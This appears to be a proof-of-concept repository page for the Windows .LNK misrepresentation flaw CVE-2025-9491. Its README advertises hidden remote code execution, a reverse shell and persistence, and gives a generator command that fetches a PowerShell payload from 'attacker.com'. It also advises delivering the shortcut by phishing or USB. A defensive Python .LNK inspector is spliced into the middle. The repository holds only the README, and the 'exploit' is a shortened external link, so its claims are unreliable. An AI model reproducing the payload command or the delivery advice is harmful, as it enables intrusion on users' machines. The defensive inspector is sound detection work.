Associated Vulnerability
Title: Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability (CVE-2025-9491)

Description: Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of .LNK files. Crafted data in an .LNK file can cause hazardous content in the file to be invisible to a user who inspects the file via the Windows-provided user interface. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25373.
Readme
# Proof-of-Concept exploit for the LNK file vulnerability (CVE-2025-9491)
## Overview
This repository contains a PoC exploit for CVE-2025-9491, a remote code execution (RCE) vulnerability in Microsoft Windows caused by LNK file UI misrepresentation. The PoC exploit enables attackers to craft .LNK files that conceal malicious payloads from the Windows user interface, allowing arbitrary code execution on the target system when the file is opened.
**Important Disclaimer:** This PoC exploit is provided strictly for educational and security research purposes. Use it only in isolated test environments, such as virtual machines, with explicit permission. Do not deploy this in production or for unauthorized activities. The maintainer assumes no liability for misuse. Always adhere to ethical hacking guidelines and legal standards.
## Affected Systems
- Microsoft Windows 10 (builds 19041 and newer)
- Microsoft Windows 11 (all builds up to 23H2)
- Microsoft Windows Server 2016, 2019, and 2022
## Exploit Details
CVE-2025-9491 exploits a flaw in Windows .LNK file parsing, where manipulated structures in the ShellLinkHeader, LinkTargetIDList, and ExtraData blocks allow hidden command execution. This results in remote code execution (RCE) by tricking users into interacting with a seemingly harmless shortcut file.
### Key Exploit Mechanics
- **UI Deception**: The .LNK file is crafted to display benign properties (e.g., icon, description, target path) in Windows Explorer, the Properties dialog, or tooltips, while embedding invisible payloads. This uses techniques like offset overflows, null-byte injections, and malformed string terminators to bypass visual inspection.
- **RCE Payload Delivery**: Upon double-clicking the file, Windows executes the hidden commands in the context of the current user. The exploit can:
  - Download and run remote scripts (e.g., via PowerShell from a C2 server).
  - Inject shellcode to spawn processes like cmd.exe or powershell.exe with arbitrary arguments.
  - Achieve persistence by writing to startup locations or registry keys.
- **Attack Vector**: Delivered through phishing (email attachments, malicious downloads), drive-by downloads, or shared network folders. Requires user interaction, but social engineering makes it highly effective for targeted RCE.
This PoC exploit demonstrates full RCE by executing a remote payload that establishes a reverse shell, allowing command-and-control over the victim's machine. It has been tested on unpatched systems, achieving code execution without alerts from default Windows Defender configurations.
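The advisory's core point is that the .LNK StringData a user sees in the Windows UI can differ from what the file actually carries. The following inspector is an added defensive example written for this page; it is not code from the repository above and does not reproduce its generator. It parses the ShellLinkHeader and the counted StringData fields as laid out in the public MS-SHLLINK format (LinkFlags bits, IDList and LinkInfo skipping, UTF-16LE counted strings) and reports two classes of hidden content: an embedded NUL inside a counted string (the "null-byte injection" and "malformed string terminator" tricks the README names, where a NUL-terminating display stops early while the parser reads the full count) and long runs of blank or control characters that push the real arguments past what a bounded Target field would display. The thresholds `MAX_PADDING_RUN` and `MAX_ARGUMENT_LENGTH`, the `build_sample_lnk` fixture builder, and the "constructed-hidden" sample strings are assumptions made here for the demonstration, not values from the advisory.

```python
"""Defender-side inspector for Windows .LNK (MS-SHLLINK) StringData fields."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits from MS-SHLLINK section 2.1.1 (only the low byte is needed here)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# Heuristic thresholds: assumptions chosen for this example, not advisory values
MAX_PADDING_RUN = 16        # a run of this many blank/control chars is not a normal argument
MAX_ARGUMENT_LENGTH = 260   # longer than a typical Target field can show at once

STRING_DATA = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags and the StringData fields, honouring the counted-string
    lengths instead of stopping at the first NUL the way a C-string display would."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("LinkCLSID mismatch")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (4-byte size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    width = 2 if is_unicode else 1
    fields = {"flags": flags}
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {name} string")
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if is_unicode else "cp1252", errors="replace")
    return fields


def inspect_lnk(data: bytes) -> dict:
    """Flag StringData content that a naive UI rendering would not show."""
    fields = parse_lnk(data)
    findings = []
    for _, name in STRING_DATA:
        if "\x00" in fields.get(name, ""):       # counted string continues past a NUL
            findings.append(f"embedded_nul:{name}")
    args = fields.get("arguments", "")
    if re.search(r"[\s\x00-\x1f]{%d,}" % MAX_PADDING_RUN, args):
        findings.append("padding:arguments")
    if len(args) > MAX_ARGUMENT_LENGTH:
        findings.append("oversized:arguments")
    # Approximation (assumption) of a display that stops at NUL and has a bounded width
    visible = args.split("\x00", 1)[0][:MAX_ARGUMENT_LENGTH].strip()
    return {"findings": findings, "visible_arguments": visible, "full_arguments": args}


def build_sample_lnk(arguments: str) -> bytes:
    """Constructed minimal ShellLink used as a test fixture: header + CommandLineArguments only."""
    flags = HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # remaining header fields zeroed
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


if __name__ == "__main__":
    # Constructed samples: a clean shortcut, a NUL-split argument string, a padded one
    samples = {
        "clean": build_sample_lnk("/help"),
        "nul_split": build_sample_lnk("/help\x00/c echo constructed-hidden"),
        "padded": build_sample_lnk("/help" + " " * 300 + "/c echo constructed-hidden"),
    }
    for label, blob in samples.items():
        report = inspect_lnk(blob)
        print(f"{label}: findings={report['findings']} visible={report['visible_arguments']!r}")
```

Run against real shortcuts with `inspect_lnk(open(path, "rb").read())`; the useful signal for triage is the gap between `visible_arguments` and `full_arguments`, which is exactly the misrepresentation the advisory describes. The parser deliberately trusts the counted lengths and raises on truncation rather than guessing, so a file that fails to parse is itself worth a closer look.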
## Requirements
- Python 3.10 or higher
- A vulnerable Windows target for testing (unpatched pre-August 2025)
## Usage
1. Enter the directory:
   ```
   cd CVE-2025-9491
   ```
2. Generate the exploit .LNK:
   ```
   python3 generate-exploit.py --output exploit.lnk --payload-url "http://attacker.com/malicious.ps1" --target "C:\Windows\System32\notepad.exe" --rce-mode
   ```
   - `--output`: Path for the generated .LNK file.
   - `--payload-url`: URL to a remote payload (e.g., PowerShell script for RCE).
   - `--target`: Visible target to masquerade as in the UI.
   - `--rce-mode`: Enables full RCE with hidden execution flags.
3. Deliver the .LNK to the target (e.g., via email or USB). When opened, it triggers RCE by fetching and executing the remote payload silently.
## Exploit
[href](https://tinyurl.com/bde9tba4)
For any inquiries, please email me at: trannguyennam65@gmail.com
File Snapshot
[4.0K] /data/pocs/8d081785f1eba4651e151b8a14bf28ce853d6aca
└── [3.4K] README.md
0 directories, 1 file